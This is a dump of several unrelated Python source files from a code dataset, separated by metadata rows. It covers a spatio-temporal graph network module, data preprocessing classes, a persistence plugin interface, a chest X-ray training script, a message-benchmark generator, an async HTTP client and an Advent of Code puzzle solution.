        super(ASTGCN, self).__init__()
        # first block consumes the raw features; later blocks consume
        # nb_time_filter channels at the (possibly) time-strided resolution
        self.blocklist = nn.ModuleList([ASTGCN_block(in_channels, K, nb_chev_filter, nb_time_filter, time_strides, num_of_vertices, len_input)])
        self.blocklist.extend([ASTGCN_block(nb_time_filter, K, nb_chev_filter, nb_time_filter, 1, num_of_vertices, len_input//time_strides) for _ in range(nb_block-1)])
        # final convolution fuses the time axis down to num_for_predict steps
        self.final_conv = nn.Conv2d(int(len_input/time_strides), num_for_predict, kernel_size=(1, nb_time_filter))
        self.reset_parameters()

    def reset_parameters(self):
        # Xavier init for matrices, uniform init for vectors/biases
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)
            else:
                nn.init.uniform_(p)

    def forward(self, x, edge_index):
        """
        Making a forward pass. This module takes a list of ASTGCN blocks and uses a final convolution to serve as a multi-component fusion.
        B is the batch size. N_nodes is the number of nodes in the graph. F_in is the dimension of input features.
        T_in is the length of input sequence in time. T_out is the length of output sequence in time.

        Arg types:
            * x (PyTorch Float Tensor) - Node features for T time periods, with shape (B, N_nodes, F_in, T_in).
            * edge_index (Tensor): Edge indices, can be an array of a list of Tensor arrays, depending on whether edges change over time.

        Return types:
            * output (PyTorch Float Tensor)* - Hidden state tensor for all nodes, with shape (B, N_nodes, T_out).
        """
        for block in self.blocklist:
            x = block(x, edge_index)
        output = self.final_conv(x.permute(0, 3, 1, 2))[:, :, :, -1].permute(0, 2, 1)
        # (b,N,F,T)->(b,T,N,F)-conv<1,F>->(b,c_out*T,N,1)->(b,c_out*T,N)->(b,N,T)
        return output
| 46.39738 | 168 | 0.640471 | 10,414 | 0.980141 | 0 | 0 | 0 | 0 | 0 | 0 | 4,245 | 0.399529 |
33d053c085065b6932239fd9d1894cd72e3ecc5e | 1,596 | py | Python | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | null | null | null | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | null | null | null | project1/src/utils/preprocessing.py | armand33/deep_learning_epfl | 238ed860716f013a30e29ebd4b0d9c4d0c67d011 | [
"MIT"
] | 2 | 2018-05-30T09:27:13.000Z | 2018-07-05T12:38:37.000Z | """
File defining the classes Normalize and Standardize used respectively to normalize and standardize the data set.
"""
class Normalize(object):
    """Data pre-processing callable that linearly rescales values.

    Maps inputs from the source range [min_, max_] onto the target range
    [new_min, new_max].
    """

    def __init__(self, min_, max_, new_min=0, new_max=1):
        """Remember the source and target ranges.

        :param min_: Min of the un-normalized data.
        :param max_: Max of the un-normalized data.
        :param new_min: Min of the new data.
        :param new_max: Max of the new data.
        """
        self.min = min_
        self.max = max_
        self.new_min = new_min
        self.new_max = new_max

    def __call__(self, data):
        """Rescale `data` into the target range and return it.

        :param data: Data point to normalize.
        :return: Normalized data.
        """
        target_span = self.new_max - self.new_min
        source_span = self.max - self.min
        return target_span * (data - self.min) / source_span + self.new_min
class Standardize(object):
    """Data pre-processing callable that standardizes values.

    Shifts by the dataset mean and scales by its standard deviation so the
    output has a fixed mean and std.
    """

    def __init__(self, mean, std):
        """Remember the statistics of the un-standardized data.

        :param mean: Mean of the un-standardized data.
        :param std: Std of the un-standardized data.
        """
        self.mean = mean
        self.std = std

    def __call__(self, data):
        """Standardize `data` and return it.

        :param data: Data point to standardize.
        :return: Standardized data.
        """
        centered = data - self.mean
        return centered / self.std
| 27.517241 | 112 | 0.592105 | 1,469 | 0.920426 | 0 | 0 | 0 | 0 | 0 | 0 | 993 | 0.62218 |
33d1491d6a521c55fdf5d9796d0dc3453bde5f3c | 5,522 | py | Python | coalaip/plugin.py | bigchaindb/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
"Apache-2.0"
] | 20 | 2016-08-13T15:01:20.000Z | 2018-10-09T21:18:11.000Z | coalaip/plugin.py | imbi7py/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
"Apache-2.0"
] | 57 | 2016-08-04T16:02:05.000Z | 2017-09-15T08:20:06.000Z | coalaip/plugin.py | imbi7py/pycoalaip | cecc8f6ff4733f0525fafcee63647753e832f0be | [
"Apache-2.0"
] | 8 | 2018-11-15T16:34:59.000Z | 2021-07-09T00:20:37.000Z | from abc import ABC, abstractmethod, abstractproperty
class AbstractPlugin(ABC):
    """Abstract interface for all persistence layer plugins.

    Expects the following to be defined by the subclass:
        - :attr:`type` (as a read-only property)
        - :func:`generate_user`
        - :func:`get_status`
        - :func:`save`
        - :func:`transfer`
    """

    @abstractproperty
    def type(self):
        """str: A string denoting the type of plugin (e.g. BigchainDB)."""
    @abstractmethod
    def generate_user(self, *args, **kwargs):
        """Generate a new user on the persistence layer.

        Args:
            *args: argument list, as necessary
            **kwargs: keyword arguments, as necessary

        Returns:
            A representation of a user (e.g. a tuple with the user's
            public and private keypair) on the persistence layer

        Raises:
            :exc:`~.PersistenceError`: If any other unhandled error
                in the plugin occurred
        """
    @abstractmethod
    def is_same_user(self, user_a, user_b):
        """Compare the given user representations to see if they mean
        the same user on the persistence layer.

        Args:
            user_a (any): User representation, in the same format as
                :meth:`generate_user`'s output
            user_b (any): User representation, in the same format as
                :meth:`generate_user`'s output

        Returns:
            bool: Whether the given user representations are the same
            user.
        """
@abstractmethod
def get_history(self, persist_id):
"""Get the ownership history of an entity on the persistence
layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
list of dict: The ownership history of the entity, sorted
starting from the beginning of the entity's history
(i.e. creation). Each dict is of the form::
{
'user': A representation of a user as specified by the
persistence layer (may omit secret details, e.g. private keys),
'event_id': A reference id for the ownership event (e.g. transfer id)
}
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def get_status(self, persist_id):
"""Get the status of an entity on the persistence layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
Status of the entity, in any format.
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def save(self, entity_data, *, user):
"""Create the entity on the persistence layer.
Args:
entity_data (dict): The entity's data
user (any, keyword): The user the entity should be assigned
to after creation. The user must be represented in the
same format as :meth:`generate_user`'s output.
Returns:
str: Id of the created entity on the persistence layer
Raises:
:exc:`~..EntityCreationError`: If the entity failed to be
created
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def load(self, persist_id):
"""Load the entity from the persistence layer.
Args:
persist_id (str): Id of the entity on the persistence layer
Returns:
dict: The persisted data of the entity
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
@abstractmethod
def transfer(self, persist_id, transfer_payload, *, from_user, to_user):
"""Transfer the entity whose id matches :attr:`persist_id` on
the persistence layer from the current user to a new owner.
Args:
persist_id (str): Id of the entity on the persistence layer
transfer_payload (dict): The transfer's payload
from_user (any, keyword): The current owner, represented in the
same format as :meth:`generate_user`'s output
to_user (any, keyword): The new owner, represented in the same
format as :meth:`generate_user`'s output.
If the specified user format includes private
information (e.g. a private key) but is not required by
the persistence layer to identify a transfer recipient,
then this information may be omitted in this argument.
Returns:
str: Id of the transfer action on the persistence layer
Raises:
:exc:`~.EntityNotFoundError`: If the entity could not be
found on the persistence layer
:exc:`~..EntityTransferError`: If the entity failed to be
transferred
:exc:`~.PersistenceError`: If any other unhandled error
in the plugin occurred
"""
| 34.72956 | 91 | 0.588555 | 5,465 | 0.989678 | 0 | 0 | 5,104 | 0.924303 | 0 | 0 | 4,854 | 0.879029 |
33d1c4bc6b32f3dc2fadccad361068b5292dca5c | 6,016 | py | Python | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | 5 | 2020-11-12T20:11:09.000Z | 2021-03-01T12:44:05.000Z | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | null | null | null | benchmarks/chexpert/chexpert.py | paaatcha/my-thesis | e72644e0d7c8a4b6f75cf7e462d32001cbf2c75d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Autor: André Pacheco
Email: pacheco.comp@gmail.com
"""
import sys
sys.path.insert(0,'../../') # including the path to deep-tasks folder
sys.path.insert(0,'../../my_models') # including the path to my_models folder
from constants import RAUG_PATH
sys.path.insert(0,RAUG_PATH)
from raug.loader import get_data_loader
from raug.train import fit_model
from raug.eval import test_model
from my_model import set_model
import pandas as pd
import os
import torch.optim as optim
import torch.nn as nn
import torch
from aug_chexpert import ImgTrainTransform, ImgEvalTransform
import datetime
from sacred import Experiment
from sacred.observers import FileStorageObserver
from raug.utils.loader import get_labels_frequency
# Starting sacred experiment
ex = Experiment()
@ex.config
def cnfg():
    # Sacred config scope: every local assigned here becomes a config entry
    # and is injected *by name* into captured functions (see main() below),
    # so these variable names must not be changed.

    # Dataset variables
    _folder = 1  # cross-validation fold held out for validation
    _base_path = "/home/patcha/Datasets/CheXpert"
    _csv_path_train = os.path.join(_base_path, "data_Pleural Effusion_train.csv")
    _imgs_folder_train = _base_path  # image paths in the CSV are joined to this
    _batch_size = 30
    _epochs = 150

    # Training variables
    _best_metric = "loss"      # metric used to select the best checkpoint
    _pretrained = True         # start from pretrained weights
    _lr_init = 0.001
    _sched_factor = 0.1        # ReduceLROnPlateau LR multiplier
    _sched_min_lr = 1e-6
    _sched_patience = 10
    _early_stop = 15
    _weights = "frequency"     # 'frequency' -> inverse-frequency class weights in main()
    _model_name = 'mobilenet'
    # Unique run folder: model + fold + timestamp (spaces stripped for path safety).
    _save_folder = "results/" + _model_name + "_fold_" + str(_folder) + "_" + str(datetime.datetime.now()).replace(' ', '')

    # This is used to configure the sacred storage observer. In brief, it says to sacred to save its stuffs in
    # _save_folder. You don't need to worry about that.
    # NOTE(review): indentation was lost in this copy of the file; these two
    # lines are assumed to live inside cnfg() so they can see _save_folder —
    # confirm against the original source.
    SACRED_OBSERVER = FileStorageObserver(_save_folder)
    ex.observers.append(SACRED_OBSERVER)
@ex.automain
def main(_folder, _csv_path_train, _imgs_folder_train, _lr_init, _sched_factor, _sched_min_lr, _sched_patience,
         _batch_size, _epochs, _early_stop, _weights, _model_name, _pretrained, _save_folder,
         _best_metric):
    # All parameters are injected by sacred from the cnfg() config scope above.

    # Options forwarded to test_model() for metric reporting/saving.
    _metric_options = {
        'save_all_path': os.path.join(_save_folder, "best_metrics"),
        'pred_name_scores': 'predictions_best_test.csv',
        'normalize_conf_matrix': True}
    _checkpoint_best = os.path.join(_save_folder, 'best-checkpoint/best-checkpoint.pth')

    # Loading the csv file; the 'folder' column splits the data into folds:
    # fold == _folder is validation, everything else is training.
    csv_all_folders = pd.read_csv(_csv_path_train)

    print("-" * 50)
    print("- Loading validation data...")
    val_csv_folder = csv_all_folders[(csv_all_folders['folder'] == _folder)]
    train_csv_folder = csv_all_folders[csv_all_folders['folder'] != _folder]

    # Loading validation data
    val_imgs_path_ = val_csv_folder['Path'].values
    val_imgs_path = ["{}/{}".format(_imgs_folder_train, img_id) for img_id in val_imgs_path_]
    val_labels = val_csv_folder['diagnostic'].values
    val_meta_data = None  # no patient metadata is used in this benchmark
    val_data_loader = get_data_loader(val_imgs_path, val_labels, val_meta_data, transform=ImgEvalTransform(),
                                      batch_size=_batch_size, shuf=True, num_workers=16, pin_memory=True)
    print("-- Validation partition loaded with {} images".format(len(val_data_loader)*_batch_size))

    print("- Loading training data...")
    train_imgs_path_ = train_csv_folder['Path'].values
    train_imgs_path = ["{}/{}".format(_imgs_folder_train, img_id) for img_id in train_imgs_path_]
    train_labels = train_csv_folder['diagnostic'].values
    train_meta_data = None
    train_data_loader = get_data_loader(train_imgs_path, train_labels, train_meta_data, transform=ImgTrainTransform(),
                                        batch_size=_batch_size, shuf=True, num_workers=16, pin_memory=True)
    print("-- Training partition loaded with {} images".format(len(train_data_loader)*_batch_size))
    print("-"*50)

    ####################################################################################################################
    # Class names and per-class sample counts, used for the loss weighting below.
    ser_lab_freq = get_labels_frequency(train_csv_folder, "diagnostic", "Path")
    _labels_name = ser_lab_freq.index.values
    _freq = ser_lab_freq.values
    ####################################################################################################################
    print("- Loading", _model_name)
    model = set_model(_model_name, len(_labels_name), pretrained=_pretrained)
    ####################################################################################################################

    # 'frequency' is replaced by inverse-frequency class weights so that
    # rare classes contribute more to the cross-entropy loss.
    if _weights == 'frequency':
        _weights = (_freq.sum() / _freq).round(3)
    loss_fn = nn.CrossEntropyLoss(weight=torch.Tensor(_weights).cuda())  # NOTE: requires a CUDA device
    optimizer = optim.SGD(model.parameters(), lr=_lr_init, momentum=0.9, weight_decay=0.001)
    scheduler_lr = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=_sched_factor, min_lr=_sched_min_lr,
                                                        patience=_sched_patience)
    ####################################################################################################################

    print("- Starting the training phase...")
    print("-" * 50)
    fit_model(model, train_data_loader, val_data_loader, optimizer=optimizer, loss_fn=loss_fn, epochs=_epochs,
              epochs_early_stop=_early_stop, save_folder=_save_folder, initial_model=None,
              device=None, schedule_lr=scheduler_lr, config_bot=None, model_name="CNN", resume_train=False,
              history_plot=True, val_metrics=["auc"], best_metric=_best_metric)
    ####################################################################################################################

    # Testing the validation partition with the best checkpoint found above.
    print("- Evaluating the validation partition...")
    test_model(model, val_data_loader, checkpoint_path=_checkpoint_best, loss_fn=loss_fn, save_pred=True,
               partition_name='eval', metrics_to_comp='all', class_names=_labels_name, metrics_options=_metric_options,
               apply_softmax=True, verbose=False)
    ####################################################################################################################
| 43.280576 | 123 | 0.626995 | 0 | 0 | 0 | 0 | 5,215 | 0.866711 | 0 | 0 | 1,805 | 0.299983 |
33d3616fffd736ee6840aea7591ae150b299a6b4 | 1,673 | py | Python | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | python-benchmarking-tools/haste/benchmarking/messaging.py | HASTE-project/benchmarking-tools | 3e65cd4019287051a612bc21fa68e4b1a5bbc745 | [
"BSD-3-Clause"
] | null | null | null | import random
import string
from itertools import repeat
import time
# 1 KB of random alphanumeric characters, generated once at import time.
RANDOM_1KB = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits)
                     for _ in range(1000))
# ~100 MB padding pool built by tiling the 1 KB sample (100 * 1024 copies);
# generate_message() slices its payload from this buffer.
RANDOM_100MB = bytearray(''.join(list(repeat(RANDOM_1KB, 100 * 1024))), 'utf-8')
NEWLINE = bytes("\n", 'UTF-8')[0]  # 10 — single byte value used as terminator
# Monotonic per-process message counter, embedded in generated filenames.
_counter = 0
# This takes ~0.04 seconds! but we only need to do it each time we change the params
def generate_message(shared_state_copy, newline_terminator=True):
    """Build one benchmark message of ``shared_state_copy['message_bytes']`` bytes.

    Layout: ``C<cpu_pause_ms as %06d>-F<filename>-<random padding>``. When
    *newline_terminator* is true, one extra byte is appended and overwritten
    with ``\\n`` (so the total length is ``message_bytes + 1``, matching the
    length check in ``__main__``).

    :param shared_state_copy: dict with 'cpu_pause_ms' and 'message_bytes'
    :param newline_terminator: append a trailing newline byte when True
    :return: ``(content_bytes, filename)`` — the message as a bytearray and
        the timestamp+counter filename embedded in its header
    """
    global _counter
    _counter += 1
    # BUG FIX: wrap the counter with modulo. The original used the bitwise
    # AND ``_counter & 10000000``, which collapses almost every counter value
    # to 0 and defeats the uniqueness of the generated filenames.
    filename = "%s_%08d" % (str(time.time()), _counter % 10000000)
    content = "C%06d-F%s-" % (shared_state_copy['cpu_pause_ms'], filename)
    content_bytes = bytearray(content, 'UTF-8')
    # Pad with pre-generated random data up to the requested size.
    length = shared_state_copy['message_bytes'] - (len(content_bytes))
    if newline_terminator:
        length = length + 1
    content_bytes.extend(RANDOM_100MB[:length])
    if newline_terminator:
        content_bytes[-1] = NEWLINE
    return content_bytes, filename
def parse_message(line):
    """Recover the CPU-pause value embedded in a message header.

    Characters/bytes 1..6 hold the zero-padded ``%06d`` value written by
    ``generate_message`` right after the leading 'C'.
    """
    pause_field = line[1:7]
    return {'cpu_pause_ms': int(pause_field)}
if __name__ == '__main__':
    # Smoke test: generate one 30 MB message and round-trip the CPU-pause field.
    shared_state = {'cpu_pause_ms': 123, 'message_bytes': 30000000}
    time_start = time.time()
    line, filename = generate_message(shared_state)
    print(time.time() - time_start)  # rough generation-time measurement
    if len(line) != 30000000 + 1:  # account for \n
        print(len(line))
        raise Exception('generated message is wrong length')
    print('generated message is correct length')
    parsed = parse_message(line)
    if parsed['cpu_pause_ms'] != 123:
        raise Exception('CPU pause failed round trip conversion')
    print('CPU pause completed round trip conversion')
| 29.875 | 99 | 0.683802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 405 | 0.24208 |
33d4ad03546e671d2c748b882701c31df889c607 | 5,338 | py | Python | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | async_mgun/mgun.py | maximdanilchenko/async-mgun | 66a2f1123407f91682fc8e6491ddadfb3690e238 | [
"MIT"
] | null | null | null | import json
from collections import namedtuple
import aiohttp
# Canonical HTTP verb names, re-exported from aiohttp's header constants.
METHOD_GET = aiohttp.hdrs.METH_GET
METHOD_DELETE = aiohttp.hdrs.METH_DELETE
METHOD_POST = aiohttp.hdrs.METH_POST
METHOD_PUT = aiohttp.hdrs.METH_PUT
METHOD_PATCH = aiohttp.hdrs.METH_PATCH

CONTENT_TYPE = aiohttp.hdrs.CONTENT_TYPE
JSON_TYPE = 'application/json'

# Verbs that carry query params only vs. verbs that may carry a JSON body
# (UrlBuilder.request rejects a body for GET_METHODS).
GET_METHODS = [METHOD_GET,
               METHOD_DELETE]
POST_METHODS = [METHOD_POST,
                METHOD_PUT,
                METHOD_PATCH]
ALL_METHODS = GET_METHODS + POST_METHODS
ALL_METHODS_LOWER = [method.lower() for method in ALL_METHODS]

# Public API of this module.
__all__ = ['HttpClient',
           'HttpClientGroup',
           'METHOD_GET',
           'METHOD_DELETE',
           'METHOD_POST',
           'METHOD_PUT',
           'METHOD_PATCH']

# (url, headers) descriptor — declared here but not used within this module.
ApiInfo = namedtuple('ApiInfo', ['url', 'headers'])
# Uniform return value of every request: HTTP status + decoded payload.
ApiResponse = namedtuple('ApiResponse', ['status', 'data'])
def format_path(path):
    """Coerce *path* to text and trim any leading/trailing underscores,
    so attribute names like ``_users_`` map to the URL segment ``users``."""
    return format(path).strip('_')
async def format_response(response: aiohttp.ClientResponse, _json=json):
    """Convert an aiohttp response into an ApiResponse.

    JSON bodies (per the Content-Type header) are decoded with the supplied
    json-compatible module; everything else is returned as text.
    """
    declared_type = response.headers.get(CONTENT_TYPE, '').lower()
    if JSON_TYPE in declared_type:
        payload = await response.json(loads=_json.loads)
    else:
        payload = await response.text()
    return ApiResponse(response.status, payload)
class UrlBuilder:
    """Accumulates URL path segments and performs the final HTTP request.

    Mutable: every attribute/item access appends one segment and returns the
    same builder, so ``client.api.users[1]`` builds ``<base>/api/users/1``.
    """

    def __init__(self, http_client, url, headers, json_worker, *args):
        self.base_url = url
        self.headers = headers
        self.http_client = http_client  # owning HttpClient; supplies sessions
        self.sub_url = [format_path(arg) for arg in args]
        self.json = json_worker         # json-compatible module (loads/dumps)

    def __getattr__(self, item):
        # Any unknown attribute is treated as the next path segment
        # (leading/trailing underscores trimmed by format_path).
        self.sub_url.append(format_path(item))
        return self

    __getitem__ = __getattr__  # builder['users'] behaves like builder.users

    def __str__(self):
        return '{}/{}'.format(self.base_url,
                              "/".join(self.sub_url)) if self.sub_url else self.base_url

    __repr__ = __str__

    async def request(self, method, content=None, params=None, session=None, headers=None):
        """Send *method* to the accumulated URL and return an ApiResponse.

        Raises UnsupportedHttpMethod for a verb outside ALL_METHODS, and
        ContentInGet when a body is supplied with a GET/DELETE request.
        """
        if method not in ALL_METHODS:
            raise UnsupportedHttpMethod()
        if method in GET_METHODS and content:
            raise ContentInGet()
        return await self._check_session(method=method,
                                         url=self.__str__(),
                                         content=content,
                                         params=params,
                                         session=session,
                                         headers=headers)

    async def _check_session(self, headers=None, session=None, **kwargs):
        # Reuse the caller-provided session when given; otherwise open a
        # one-shot session from the owning client and close it afterwards.
        if not session:
            async with self.http_client.session(headers=headers) as session:
                return await self._make_request(session=session, **kwargs)
        return await self._make_request(session=session, **kwargs)

    async def _make_request(self, session, method, url, content=None, params=None):
        # `content` is sent as the request's JSON body.
        async with session.request(method, url, params=params, json=content) as response:
            return await format_response(response, self.json)

    # Convenience wrappers: GET/DELETE take query params,
    # POST/PUT/PATCH take a JSON body.
    async def get(self, params=None, **kwargs):
        return await self.request(method=METHOD_GET,
                                  params=params,
                                  **kwargs)

    async def delete(self, params=None, **kwargs):
        return await self.request(method=METHOD_DELETE,
                                  params=params,
                                  **kwargs)

    async def post(self, content=None, **kwargs):
        return await self.request(method=METHOD_POST,
                                  content=content,
                                  **kwargs)

    async def put(self, content=None, **kwargs):
        return await self.request(method=METHOD_PUT,
                                  content=content,
                                  **kwargs)

    async def patch(self, content=None, **kwargs):
        return await self.request(method=METHOD_PATCH,
                                  content=content,
                                  **kwargs)
class UnsupportedHttpMethod(Exception):
    """Raised by UrlBuilder.request() for an HTTP verb outside ALL_METHODS."""
    pass


class ContentInGet(Exception):
    """Raised when a body is supplied with a GET/DELETE request."""
    pass


class NoBaseUrl(Exception):
    """Raised by HttpClientGroup for an unknown client name."""
    pass
def session_maker(self, headers=None):
    """Create an aiohttp.ClientSession for an HttpClient instance.

    Defined at module level but bound as an HttpClient method via
    ``s = session = session_maker`` (so ``self`` is the client).
    Per-call *headers* are merged with the client's default headers; on key
    clashes the client's defaults win, since they are applied last.
    """
    headers = headers or {}
    if self.headers:
        headers.update(self.headers)
    return aiohttp.ClientSession(trust_env=True,
                                 headers=headers or None,
                                 json_serialize=self.json.dumps)
class HttpClient:
    """Fluent HTTP client: attribute/item access builds a URL path.

    ``HttpClient('http://h').api.users[42].get()`` requests
    ``http://h/api/users/42``. Every attribute access creates a fresh
    UrlBuilder, so a client instance can be reused.
    """

    def __init__(self, url, headers=None, json_worker=None):
        self.url = url                    # base URL for every built request
        self.headers = headers            # default headers merged into sessions
        self.json = json_worker or json   # pluggable json module (loads/dumps)

    # Module-level session_maker bound as a method; both aliases are usable.
    s = session = session_maker

    def __str__(self):
        return self.url

    def __getattr__(self, name):
        # A verb name ('get', 'post', ...) targets the bare base URL;
        # any other name starts a sub-path.
        if name in ALL_METHODS_LOWER:
            return getattr(UrlBuilder(self, self.url, self.headers, self.json), name)
        return UrlBuilder(self, self.url, self.headers, self.json, name)

    __getitem__ = __getattr__
class HttpClientGroup:
    """Named collection of HttpClient instances, addressed by attribute.

    Each rule is a tuple ``(name, url, *headers)``; the trailing elements are
    passed to ``dict()`` to build that client's default headers.
    NOTE(review): that requires the extras to be key/value pairs, e.g.
    ``('api', 'http://h', ('X-Token', 't'))`` — confirm against callers.
    """

    def __init__(self, *rules, json_worker=None):
        self.urls = {name: HttpClient(url, dict(headers), json_worker)
                     for name, url, *headers in rules}

    def __getattr__(self, name):
        if name in self.urls:
            return self.urls.get(name)
        else:
            raise NoBaseUrl('{} is not in urls'.format(name))
| 32.156627 | 91 | 0.597602 | 3,755 | 0.703447 | 0 | 0 | 0 | 0 | 2,425 | 0.45429 | 201 | 0.037655 |
33d598edbbc9d5f212435ece8b2d3abdac48c312 | 45 | py | Python | python/testData/postfix/not/and_after.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/postfix/not/and_after.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/postfix/not/and_after.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | def f():
return True and not False<caret> | 22.5 | 36 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33d662830f0507f69d63779e877716fe18bc04aa | 7,071 | py | Python | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | 1 | 2020-03-22T16:25:01.000Z | 2020-03-22T16:25:01.000Z | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | null | null | null | 10/10.py | andleb/aoc18 | 408bf9a92f30fee692d7a2cd9b2a72ab1bbd7711 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Dec 9 23:12:30 2018
@author: Andrej Leban
"""
import itertools as it
import functools as ft
import collections as coll
import sortedcontainers as sc
from blist import blist
import re
import numpy as np
import scipy.signal
import scipy.sparse
import matplotlib.pyplot as plt
def parseInput(inp):
    """Read the file at *inp* and return its lines (newlines preserved)."""
    with open(inp, 'r') as handle:
        return [row for row in handle]
def consecutive_ones(sequence):
    """Lazily yield each maximal run of consecutive 1s in *sequence*,
    one tuple per run (elements not equal to 1 act as separators)."""
    def _runs():
        current = []
        for value in sequence:
            if value == 1:
                current.append(value)
            elif current:
                yield tuple(current)
                current = []
        if current:
            yield tuple(current)
    return _runs()
def sames(sequence):
    """Yield maximal runs of consecutive 1s in *sequence* as tuples.

    NOTE: this is a copy-paste duplicate of consecutive_ones (same contract);
    it is kept as an independent function for interface compatibility.
    """
    def _same():
        source = iter(sequence)
        while True:
            group = tuple(it.takewhile(lambda p: p == 1,
                                       it.dropwhile(lambda p: p != 1, source)))
            if not group:
                break
            yield group
    return _same()
if __name__ == "__main__":
    # AoC 2018 day 10: points drift with constant velocity; the message
    # appears at the step where many points align into long vertical strokes.
    # (Large blocks of commented-out sample data and abandoned convolution
    # experiments were removed for readability.)
    data = parseInput("input.txt")

    pos = []
    dpos = []
    # init: parse "position=<x, y> velocity=<dx, dy>" lines.
    # NOTE(review): the first regex capture is stored as `y` and the second
    # as `x`, so the axis names are swapped consistently throughout.
    for line in data:
        y, x, dy, dx = tuple(map(int,
                                 re.search('position=<\s*([-,0-9]+)\s*,\s*([-,0-9]+)\s*>.*'
                                           'velocity=<\s*([-,0-9]+)\s*,\s*([-,0-9]+)',
                                           line).groups()))
        pos.append((y, x))
        dpos.append((dy, dx))

    # Positions/velocities as parallel numpy arrays for vectorized stepping.
    posy = np.array([t[1] for t in pos])
    posx = np.array([t[0] for t in pos])
    dposy = np.array([t[1] for t in dpos])
    dposx = np.array([t[0] for t in dpos])

    res = []
    critLx = 8  # minimum number of points sharing one x to count as a stroke
    critLy = 8  # minimum consecutive-y run length within such a stroke
    i = 0
    # Step the simulation until one frame contains a qualifying stroke.
    while len(res) < 1:
        posy += dposy
        posx += dposx

        # Sort points by (x, y) so equal-x points are adjacent.
        sor = sorted(zip(posx, posy))
        x = [t[0] for t in sor]
        y = [t[1] for t in sor]

        # seqs with same x: group (index, x) pairs by x value
        samesx = sorted([list(l) for _, l in
                         it.groupby(enumerate(x), key=lambda x: x[1])])
        # those that are at least critLx long
        crit = list(filter(lambda x: len(x) >= critLx, samesx))

        # find consecutive ys within each candidate column
        succCands = []
        for cand in crit:
            ys = y[cand[0][0]:cand[-1][0]+1]
            ylen = 1
            ylens = []
            yprev = ys[0]
            succ = True  # NOTE(review): unused leftover
            for j in range(1, len(ys)):
                # ignore duplicates:
                if ys[j] == yprev:
                    continue
                if ys[j] - yprev == 1:
                    ylen += 1
                    yprev = ys[j]
                    continue
                else:
                    # run broken: record its length and restart
                    ylens.append(ylen)
                    ylen = 1
                    yprev = ys[j]
            ylens.append(ylen)
            succY = list(filter(lambda x: x >= critLy, ylens))
            if len(succY):
                succCands.append(cand)

        if len(succCands):
            print("found")
            res.append((i, succCands, sor))
        i += 1
        if not i % 100000:
            print(i)  # progress heartbeat

    # Render the winning frame as a 0/1 grid (part 2 answer is the step
    # count printed at the end).
    sor = res[0][2]
    sx, sy = zip(*sor)
    sy = sorted(sy)
    offsety, sizy = sy[0], sy[-1] - sy[0] + 1
    offsetx, sizx = sx[0], sx[-1] - sx[0] + 1
    pic = np.zeros((sizy, sizx))
    for x, y in res[0][2]:
        try:
            pic[y-offsety, x-offsetx] = 1
        except KeyError:
            # NOTE(review): numpy raises IndexError for out-of-range indices,
            # so this guard would not actually catch a bad index.
            pass
    print("\n\n\n", pic, "\n\n\n")
    print(i)
33d6fb43a44d5548c53fbae7aa5f5112f385cc23 | 808 | py | Python | __init__.py | rookiepeng/radarsimpy | e26cc8eb1b913630dfdc9d3443279b4ae54c0109 | [
"MIT"
